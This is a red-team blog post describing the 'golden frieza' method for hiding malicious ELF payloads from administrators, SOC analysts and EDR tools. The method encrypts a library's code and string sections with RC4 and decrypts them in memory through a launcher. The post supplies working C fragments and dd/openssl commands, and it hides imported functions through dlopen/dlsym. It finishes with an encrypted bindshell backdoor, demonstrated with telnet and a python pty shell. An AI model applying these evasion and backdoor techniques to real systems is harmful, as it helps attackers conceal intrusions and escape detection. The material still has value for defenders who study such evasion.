Imagine finding yourself in a “hostile” environment, one where you can’t run exploits,
tools and applications without worrying about prying eyes spying on you, be they a
legitimate system administrator, a colleague sharing access with you or a software
solution that scans the machine you are logged in to for malicious files. Your binary
should live in encrypted form in the filesystem, so that no static analysis is
possible even if it is identified and copied somewhere else. It should be decrypted only
on the fly in memory when executed, which also prevents dynamic analysis unless the
decryption key is known.
HOW TO IMPLEMENT THAT?
On paper everything looks fine, but in practice how do we implement this? At Red
Timmy Security we have created the “golden frieza” project, a collection of several
techniques to support on-the-fly encryption/decryption of binaries. Even though we are
not yet ready to release the full project, we are going to discuss in depth one of the
methods it implements, accompanied by some supporting source code.
Why is the discussion relevant to security analysts working in SOC departments,
Threat Intelligence and Red Teams alike? Think about a typical Red Team operation, in which
tools that commonly trigger security alerts to the SOC, such as “procmon” or “mimikatz”, are
uploaded to a compromised machine and then launched without the installed
endpoint protection solutions or the EDR agents complaining about that.
Alternatively, think about a zero-day privilege escalation exploit that an attacker wants
to run locally on a freshly hacked system, but does not want it to be reverse engineered
while stored in the filesystem and consequently divulged to the rest of the world. This is
exactly the kind of technique we are going to talk about.
A short premise before getting started. All the examples and code released (github link)
work with ELF binaries. Conceptually there is nothing preventing you from implementing
the same techniques with Windows PE binaries, with the appropriate
adjustments of course.
WHAT TO ENCRYPT?
An ELF binary file is composed of multiple sections. We are mostly interested in encrypting
the “.text” section, which holds the instructions that the CPU executes when the
interpreter maps the binary in memory and transfers execution control to it. Put
simply, the “.text” section contains the logic of our application that we do not want to
be reverse-engineered.
WHICH CRYPTO ALGORITHM TO USE?
To encrypt the “.text” section we will avoid block ciphers, which would force the binary
instructions in that section to be aligned to the block size. A stream cipher
fits perfectly in this case, because the length of the ciphertext produced in output is
equal to that of the plaintext, hence there are no padding or alignment requirements to satisfy.
We choose RC4 as the encryption algorithm. The discussion of its security is beyond the
scope of this blog post. You might implement whatever else you like as a replacement.
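To make the "no padding" property concrete, here is a minimal RC4 sketch in C. It is not the code shipped with the project: the names "rc4_ctx", "rc4_init" and "rc4_crypt" are ours, chosen for illustration. The same call both encrypts and decrypts, and the buffer is transformed in place without changing its length.

```c
#include <stddef.h>
#include <stdint.h>

/* RC4 state: a 256-byte permutation plus two running indices.
 * (Illustrative names, not taken from the golden frieza sources.) */
typedef struct {
    uint8_t s[256];
    uint8_t i, j;
} rc4_ctx;

/* Key-scheduling algorithm: shuffle the permutation with the key. */
void rc4_init(rc4_ctx *ctx, const uint8_t *key, size_t keylen)
{
    uint8_t j = 0, t;

    for (int n = 0; n < 256; n++)
        ctx->s[n] = (uint8_t)n;
    for (int n = 0; n < 256; n++) {
        j = (uint8_t)(j + ctx->s[n] + key[n % keylen]);
        t = ctx->s[n]; ctx->s[n] = ctx->s[j]; ctx->s[j] = t;
    }
    ctx->i = ctx->j = 0;
}

/* Keystream generation: XOR one keystream byte into each byte of buf.
 * Output length equals input length, so no padding is ever needed. */
void rc4_crypt(rc4_ctx *ctx, uint8_t *buf, size_t len)
{
    uint8_t t;

    for (size_t n = 0; n < len; n++) {
        ctx->i = (uint8_t)(ctx->i + 1);
        ctx->j = (uint8_t)(ctx->j + ctx->s[ctx->i]);
        t = ctx->s[ctx->i];
        ctx->s[ctx->i] = ctx->s[ctx->j];
        ctx->s[ctx->j] = t;
        buf[n] ^= ctx->s[(uint8_t)(ctx->s[ctx->i] + ctx->s[ctx->j])];
    }
}
```

Calling "rc4_init()" followed by "rc4_crypt()" twice with the same key returns the original bytes, which is what allows a launcher to reuse one routine for decryption.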
THE IMPLEMENTATION
The technique to be implemented must be as simple as possible. We want to avoid
manual memory mappings and symbol relocations. For example, our solution could rely
on two components:
(a) an ELF file compiled as a dynamic library exporting one or more functions
containing the encrypted instructions to be protected from prying eyes;
(b) the launcher, a program that takes as an input the ELF dynamic library, decrypts
it in memory by means of a crypto key and then executes it.
What is not clear yet is what we should encrypt: the full “.text” section or just the
malicious functions exported in the ELF module? Let’s run an
experiment. The following source code exports a function called “testalo()” taking no
parameters. After compilation we want it to be decrypted only once it is loaded in memory.
We compile the code as a dynamic library:
$ gcc testalo_mod.c -o testalo_mod.so -shared -fPIC
Now let’s have a look at its sections with “readelf”:
The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the
beginning of testalo_mod.so) and its size is 0x100 (256 bytes). What if we fill this
space with zeros and then try to programmatically load the library? Will it be mapped in
our process memory, or will the interpreter have something to complain about? Since the
encryption procedure turns the binary instructions into garbage, filling the “.text” section
of our module with zeros simulates that effect without actually encrypting
the binary. We can do that by executing the command:
$ dd if=/dev/zero of=testalo_mod.so seek=1408 bs=1 count=256 conv=notrunc
…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:
$ xxd testalo_mod.so
[...]
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
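The offset and size that we read from “readelf” and fed to “dd” above can also be retrieved programmatically. The following is a sketch under a few assumptions: a 64-bit ELF file, the Linux <elf.h> header, and a helper name (“elf64_find_section”) that is ours and not part of the released code.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Look up a section by name in a 64-bit ELF file.
 * Returns 0 and fills *off and *size with the file offset and length,
 * or -1 if the file cannot be parsed or the section is not found. */
int elf64_find_section(const char *path, const char *name,
                       unsigned long *off, unsigned long *size)
{
    Elf64_Ehdr eh;
    Elf64_Shdr *sh = NULL, *names;
    char *strtab = NULL;
    int rc = -1;

    FILE *f = fopen(path, "rb");
    if (!f)
        return -1;

    /* Read and sanity-check the ELF header. */
    if (fread(&eh, sizeof eh, 1, f) != 1 ||
        memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_shentsize != sizeof(Elf64_Shdr) ||
        eh.e_shnum == 0 || eh.e_shstrndx >= eh.e_shnum)
        goto out;

    /* Load the whole section header table. */
    sh = malloc(eh.e_shnum * sizeof *sh);
    if (!sh || fseek(f, (long)eh.e_shoff, SEEK_SET) != 0 ||
        fread(sh, sizeof *sh, eh.e_shnum, f) != eh.e_shnum)
        goto out;

    /* Load the string table that holds the section names. */
    names = &sh[eh.e_shstrndx];
    strtab = malloc(names->sh_size + 1);
    if (!strtab || fseek(f, (long)names->sh_offset, SEEK_SET) != 0 ||
        fread(strtab, 1, names->sh_size, f) != names->sh_size)
        goto out;
    strtab[names->sh_size] = '\0';

    for (int i = 0; i < eh.e_shnum; i++) {
        if (sh[i].sh_name < names->sh_size &&
            strcmp(strtab + sh[i].sh_name, name) == 0) {
            *off = sh[i].sh_offset;
            *size = sh[i].sh_size;
            rc = 0;
            break;
        }
    }
out:
    free(strtab);
    free(sh);
    fclose(f);
    return rc;
}
```

Called with “testalo_mod.so” and “.text”, a helper like this should report the same two values that “readelf” shows for that section.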
To spot the final behavior that we are attempting to observe, we need an application (see
code snippet of “dlopen_test.c” below) that tries to map the “testalo_mod.so” module
into its address space (line 12) and then, in case of success, checks if at runtime the
function “testalo()” gets resolved (line 18) and executed (line 23).
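For readers without the original listing at hand, the three steps (map the module, resolve the symbol, call it) can be sketched as below. This is not the author's “dlopen_test.c”, so the line numbers quoted in the text do not apply to it; the function name “load_and_call” is hypothetical.

```c
#include <dlfcn.h>
#include <stdio.h>

/* Map a shared object, resolve a no-argument function by name and call it.
 * Returns 0 on success, -1 if loading or symbol resolution fails. */
int load_and_call(const char *path, const char *symbol)
{
    const char *err;
    void (*fn)(void);

    /* Step 1: map the module. Its initialization code runs here. */
    void *handle = dlopen(path, RTLD_LAZY);
    if (!handle) {
        err = dlerror();
        fprintf(stderr, "dlopen: %s\n", err ? err : "unknown error");
        return -1;
    }

    /* Step 2: resolve the exported function at runtime. */
    *(void **)(&fn) = dlsym(handle, symbol);
    if (!fn) {
        err = dlerror();
        fprintf(stderr, "dlsym: %s\n", err ? err : "symbol not found");
        dlclose(handle);
        return -1;
    }

    /* Step 3: transfer execution to the resolved function. */
    fn();
    dlclose(handle);
    return 0;
}
```

A “main()” that calls load_and_call("./testalo_mod.so", "testalo") exercises the same three points at which the experiment can fail.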
$ gcc dlopen_test.c -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)
What we are observing here is that the program crashes during the execution of line 12.
Why? This happens because, even if the call to “dlopen()” in our application does not
explicitly invoke anything from “testalo_mod.so”, there are functions inside
“testalo_mod.so” itself that are automatically called (such as “frame_dummy()”)
during the module initialization process. A “gdb” session will help here.
$ objdump -M intel -d testalo_mod.so
Because such functions are all zeroed, a segmentation fault occurs when the
execution flow is transferred to them. What if we only encrypted the content of the
“testalo()” function, where our logic resides? To do that we just recompile
“testalo_mod.so” and determine the size of the function’s code with the command
“objdump -M intel -d testalo_mod.so”, by observing where the function starts and
where it ends:
The formula to calculate our value is 0x680 – 0x65a = 0x26 = 38 bytes.
Finally we overwrite the library “testalo_mod.so” with 38 bytes of zeros, starting from
where the “testalo()” function is located, which this time is offset 0x65a = 1626 bytes from
the beginning of the file:
$ dd if=/dev/zero of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc
Then we can launch “dlopen_test” again:
$ ./dlopen_test
Segmentation fault (core dumped)
Previously we got stuck at line 12 in “dlopen_test.c”, during the initialization of
the “testalo_mod.so” dynamic library. Now instead we get stuck at line 23: by then
“testalo_mod.so” has been properly mapped in our process memory and the “testalo()”
symbol has already been resolved from it (line 18), but the function is finally invoked
(line 23), which in turn causes the crash. Of course, the binary instructions are invalid
because we zeroed that block of memory beforehand. However, if we had really put
encrypted instructions there and decrypted them all before the invocation of
“testalo()”, everything would have worked smoothly.
So, we know now what to encrypt and how to encrypt it: only the exported functions
holding our malicious payload or application logic, not the whole text section.
NEXT STEP: A FIRST PROTOTYPE FOR THE PROJECT
Let’s see a practical example of how to decrypt in memory our encrypted payload. We
said at the beginning that two components are needed in our implementation:
(a) an ELF file compiled as a dynamic library exporting one or more functions
containing the encrypted instructions to be protected from prying eyes;
(b) the launcher, a program that takes as an input the ELF dynamic library,
decrypting it in memory by means of a crypto key and then executing it.
Regarding point (a), we will continue to use “testalo_mod.so” for now, encrypting
only the content of the “testalo()” function. Instead of writing a specific program for that, we just
take advantage of existing tools such as “dd” and “openssl”:
$ dd if=./testalo_mod.so of=./text_section.txt skip=1626 bs=1 count=38
$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad
$ dd if=./text_section.enc of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc
The first command extracts the 38 bytes composing the binary instructions of
“testalo()”. The second command encrypts them with the RC4 key “AAAAAAAAAAAAAAAA”
(hex representation -> “41414141414141414141414141414141”) and the third command
writes the encrypted content back to the place where “testalo()” is located in the
binary. If we now observe the code of that function with the command “objdump -M intel
-d ./testalo_mod.so”, it is indeed unintelligible:
The second component needed is the launcher (b). Let’s analyze its C code piece by
piece. First it acquires, in hexadecimal format, the offset where our encrypted function is
mapped (information that we retrieve with “readelf”) and its length in bytes (line 102).
Then the terminal echo is disabled (lines 116-125) so that the user can safely type in
the crypto key (line 128), and finally the terminal is restored to its original
state (lines 131-135).
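The echo handling can be sketched with the standard termios calls. What follows is an illustrative routine, not the launcher's own code; the name “read_secret” is an assumption of ours. If standard input is not a terminal, the sketch simply reads the line without touching any terminal settings.

```c
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

/* Read one line from stdin into buf with terminal echo turned off.
 * Returns the number of characters read (newline stripped),
 * or -1 on error or end of input. */
int read_secret(char *buf, size_t buflen)
{
    struct termios saved, noecho;
    int have_tty = (tcgetattr(STDIN_FILENO, &saved) == 0);

    if (have_tty) {
        noecho = saved;
        noecho.c_lflag &= ~(tcflag_t)ECHO;      /* disable echo only */
        if (tcsetattr(STDIN_FILENO, TCSAFLUSH, &noecho) != 0)
            return -1;
    }

    char *line = fgets(buf, (int)buflen, stdin);

    /* Restore the original terminal state whatever fgets() returned. */
    if (have_tty)
        tcsetattr(STDIN_FILENO, TCSAFLUSH, &saved);

    if (!line)
        return -1;
    buf[strcspn(buf, "\n")] = '\0';
    return (int)strlen(buf);
}
```

Saving the original “struct termios” and restoring it unconditionally avoids leaving the user's shell without echo if the read fails.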
Now we have the offset of our encrypted function within the module, but we do not yet know
the full memory address where it is mapped. This is determined by looking at
“/proc/PID/maps”, as in the code snippet below.
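A minimal way to perform that lookup is to scan the maps file of the current process for the first line mentioning the module name. This sketch assumes Linux procfs and uses a helper name (“find_mapping”) of our own. It also assumes that the first mapping of the module starts at file offset 0, as in the launcher output shown later, so that the function's address is the start address plus the offset given by the user.

```c
#include <stdio.h>
#include <string.h>

/* Find the first mapping in /proc/self/maps whose line contains `name`.
 * Returns 0 and fills *start and *end with the mapped address range,
 * or -1 if no line matches. */
int find_mapping(const char *name, unsigned long *start, unsigned long *end)
{
    char line[512];
    int rc = -1;

    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return -1;

    while (fgets(line, sizeof line, f)) {
        /* Each line begins with "start-end" in hexadecimal. */
        if (strstr(line, name) &&
            sscanf(line, "%lx-%lx", start, end) == 2) {
            rc = 0;
            break;
        }
    }
    fclose(f);
    return rc;
}
```

With the values from the example session, the start address plus 0x65a would be where the encrypted “testalo()” bytes live in memory.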
All the pieces are now in place to extract the encrypted binary instructions from
memory (line 199), decrypt everything with the RC4 key collected previously and
write the output back to the location where the content of the “testalo()” function lives (line
213). However, we could not do that without first marking that page of memory as
writable (lines 206-210) and then setting it back to readable/executable only (lines 218-222)
after the decrypted payload is written into it. This is because, in order to protect the
executable code against tampering at runtime, the interpreter loads it into a non-writable
memory region. After usage, the crypto key is also wiped from memory (line 214).
Now the address of the decrypted “testalo()” function can be resolved (line 228) and
the binary instructions it contains can be executed (line 234).
This first version of the launcher’s source code is downloadable from here. Let’s compile
it…
$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl
…execute it, and see how it works (in bold the user input):
$ ./golden_frieza_launcher_v1 ./testalo_mod.so
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is: testalo_mod.so
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/testalo_mod.so
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000
Execution of .text
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!
As shown at the end of the command output, the in-memory decrypted content of the
“testalo()” function is indeed successfully executed.
BUT…
What is the problem with this approach? Even if our library is
stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and
“exit()”), which need to be resolved and relocated at runtime, remain clearly visible. If
the binary ends up in the hands of a system administrator or SOC analyst, even with the
“.text” section encrypted in the filesystem, they could infer the purpose of our malicious
binary through simple static analysis tools such as “objdump” and “readelf”.
Let’s see it with a more concrete example. Instead of using a dummy library, we decide
to implement a bindshell (see the code here) and compile that code as an ELF module:
$ gcc testalo_bindshell.c -o testalo_bindshell.so -shared -fPIC
We strip the binary with the “strip” command and encrypt the relevant “.text” portion
as explained before. If we now look at the symbol table (“readelf -s
testalo_bindshell.so”) or the relocation table (“readelf -r testalo_bindshell.so”),
something very similar to the picture below appears:
This clearly reveals the usage of APIs such as “bind()”, “listen()”, “accept()”, “execl()”,
etc., which are all functions that a bindshell implementation typically imports. This is
inconvenient in our case because it reveals the nature of our code. We need a
workaround.
DLOPEN AND DLSYM
To get around the problem, the approach we adopt is to resolve external symbols at
runtime through “dlopen()” and “dlsym()”.
For example, normally a snippet of code involving a call to “socket()” would look like
this:
#include <sys/socket.h>
[...]
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
[...]
When the binary is compiled and linked, the piece of code above is responsible for the
creation of an entry about “socket()” in the dynamic symbols and relocations tables. As
already said, we want to avoid such a condition. Therefore the piece of code above must
be changed as follows:
Here “dlopen()” is invoked only once and “dlsym()” is called for every external function
that must be resolved. In practice:
“int (*_socket)(int, int, int);” -> we define a function pointer variable
having the same prototype as the original “socket()” function.
“handle = dlopen(NULL, RTLD_LAZY);” -> “if the first parameter is NULL the
returned handle is for the main program”, as stated in the Linux man page.
“_socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the
address of the “socket()” function resolved at runtime with “dlsym()”.
“(*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of
“socket(PF_INET, SOCK_STREAM, 0)”. Basically the value held by the
variable “_socket” is the address of the “socket()” function that has been
resolved with “dlsym()”.
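Putting the four fragments above together gives something along these lines. It is a sketch rather than the code of the modified bindshell: the wrapper names “resolve_symbol” and “open_tcp_socket” are ours, and <sys/socket.h> is included only for the PF_INET and SOCK_STREAM constants, which does not create an import for “socket()”.

```c
#include <dlfcn.h>
#include <stddef.h>
#include <sys/socket.h>   /* constants only: PF_INET, SOCK_STREAM */

/* Resolve a function by name from the main program and the libraries
 * already loaded with it. Returns NULL if the symbol is not found. */
void *resolve_symbol(const char *name)
{
    static void *handle;          /* dlopen() is invoked only once */

    if (!handle)
        handle = dlopen(NULL, RTLD_LAZY);
    return handle ? dlsym(handle, name) : NULL;
}

/* Same effect as socket(PF_INET, SOCK_STREAM, 0), but without a
 * "socket" entry in the dynamic symbol and relocation tables. */
int open_tcp_socket(void)
{
    /* Function pointer with the same prototype as socket(). */
    int (*_socket)(int, int, int);

    *(void **)(&_socket) = resolve_symbol("socket");
    if (!_socket)
        return -1;
    return (*_socket)(PF_INET, SOCK_STREAM, 0);
}
```

The cast through “void **” is the usual idiom for storing the result of “dlsym()” in a function pointer without a compiler warning.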
These modifications must be repeated for all the external functions “bind()”, “listen()”,
“accept()”, “execl()”, etc…
You can see the differences between the two coding styles by comparing
the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that the new
library is compiled:
$ gcc testalo_bindshell_mod.c -shared -o testalo_bindshell_mod.so -fPIC
…the main effects tied to the change of coding style are the following:
In practice the only external symbols that remain visible now are “dlopen()” and
“dlsym()”. The usage of any other socket API or function can no longer be inferred.
IS THIS ENOUGH?
This approach has some issues too. To understand that, let’s have a look at the read-only
data section in the ELF dynamic library:
What’s going on? In practice, all the strings we have declared in our bindshell module
end up in clear text inside the “.rodata” section (starting at offset 0xaf5 and ending
at offset 0xbb5), which contains all the constant values declared in the C program! Why
is this happening? It depends on the way we pass string parameters to the external
functions:
_socket = dlsym(handle, "socket");
What we can do to get around the issue is to encrypt the “.rodata” section as well, and
decrypt it on-the-fly in memory when needed, as we have already done with the binary
instructions in the “.text” section. The new version of the launcher component
(golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc
golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how
it works. First the “.text” section of our bindshell module is encrypted:
$ dd if=./testalo_bindshell_mod.so of=./text_section.txt skip=1738 bs=1 count=1055
$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad
$ dd if=./text_section.enc of=./testalo_bindshell_mod.so seek=1738 bs=1 count=1055 conv=notrunc
Same thing for the “.rodata” section:
$ dd if=./testalo_bindshell_mod.so of=./rodata_section.txt skip=2805 bs=1 count=193
$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad
$ dd if=./rodata_section.enc of=./testalo_bindshell_mod.so seek=2805 bs=1 count=193 conv=notrunc
Then the launcher is executed. It takes the bindshell module filename (now both with
encrypted “.text” and “.rodata” sections) as a parameter:
$ ./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so
The offset and length of the “.text” portion are passed as hex values (we have already seen
how to get those):
Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes
Next the offset and length of the “.rodata” section are passed as hex values too. As seen in the
last “readelf” screenshot above, in this case the section starts at 0xaf5 and the length is
calculated like this: 0xbb5 - 0xaf5 + 1 = 0xc1:
Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes
Then the launcher asks for a command line parameter. Indeed our bindshell module
(specifically the exported “testalo()” function) takes as an input parameter the TCP
port it has to listen on. We choose 9000 for this example:
Enter cmdline: 9000
Cmdline is: 9000
The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:
Enter key:
The final part of the output is:
PID is: 3915
Module name is: testalo_bindshell_mod.so
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/testalo_bindshell_mod.so
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000
Execution of .text
==================
This time below the “Execution of .text” message we get nothing. This is due to the
behavior of our bindshell that does not print anything to the standard output. However,
the bindshell backdoor has been launched properly in the background:
$ netstat -an | grep 9000
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN
$ telnet localhost 9000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)